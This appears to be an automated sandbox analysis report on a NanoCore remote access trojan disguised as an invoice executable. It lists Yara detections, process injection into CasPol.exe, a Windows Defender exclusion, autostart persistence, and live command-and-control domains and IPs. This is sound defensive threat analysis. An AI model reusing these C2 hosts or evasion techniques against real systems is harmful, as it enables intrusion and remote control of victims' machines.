        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,3_2_0040A272
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: svchost.exe, 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsService Execution2Registry Run Keys / Startup Folder11Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery321SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Software Packing11NTDSVirtualization/Sandbox Evasion14Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptProcess Injection312Timestomp1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder11Masquerading221Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion14DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358392 Sample: CN-Invoice-XXXXX9808-190111... Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 58 nanopc.linkpc.net 2->58 72 Multi AV Scanner detection for domain / URL 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 11 other signatures 2->78 8 CN-Invoice-XXXXX9808-19011143287994.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 68 coroloboxorozor.com 172.67.172.17, 49722, 49728, 49731 CLOUDFLARENETUS United States 8->68 52 C:\Windows\Microsoft.NET\...\svchost.exe, PE32 8->52 dropped 54 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 8->54 dropped 56 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->56 dropped 80 Creates an autostart registry key pointing to binary in C:\Windows 8->80 82 Writes to foreign memory regions 8->82 84 Adds a directory exclusion to Windows Defender 8->84 88 4 other signatures 8->88 19 CasPol.exe 8->19         started        23 cmd.exe 8->23         started        25 powershell.exe 26 8->25         started        34 3 other processes 8->34 70 192.168.2.1 unknown unknown 13->70 27 svchost.exe 13->27         started        86 Drops executables to the windows directory (C:\Windows) and starts them 15->86 30 svchost.exe 15->30         started        32 WerFault.exe 17->32         started        file6 signatures7 process8 dnsIp9 60 nanopc.linkpc.net 157.97.120.21, 50005 UNISCAPEBIT-ServicesHostingNL Netherlands 19->60 62 185.157.161.86, 50005 OBE-EUROPEObenetworkEuropeSE Sweden 19->62 46 C:\Users\user\AppData\Roaming\...\run.dat, data 19->46 dropped 36 conhost.exe 23->36         started        38 timeout.exe 23->38         started        40 conhost.exe 25->40         started        64 coroloboxorozor.com 27->64 48 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 27->48 dropped 90 Multi AV Scanner detection for dropped file 27->90 92 Machine Learning detection for dropped file 27->92 94 Adds a directory exclusion to Windows Defender 27->94 66 coroloboxorozor.com 30->66 50 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->50 dropped 96 System process connects to network (likely due to code injection or exploit) 30->96 42 AdvancedRun.exe 34->42         started        44 conhost.exe 34->44         started        file10 signatures11 process12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        CN-Invoice-XXXXX9808-19011143287994.exe30%VirustotalBrowse
        CN-Invoice-XXXXX9808-19011143287994.exe28%ReversingLabsByteCode-MSIL.Trojan.Generic
        CN-Invoice-XXXXX9808-19011143287994.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe0%ReversingLabs
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe28%ReversingLabsByteCode-MSIL.Trojan.Generic

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        13.2.CasPol.exe.51c0000.7.unpack100%AviraTR/NanoCore.fadteDownload File
        13.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File

        Domains

        SourceDetectionScannerLabelLink
        coroloboxorozor.com15%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.html0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
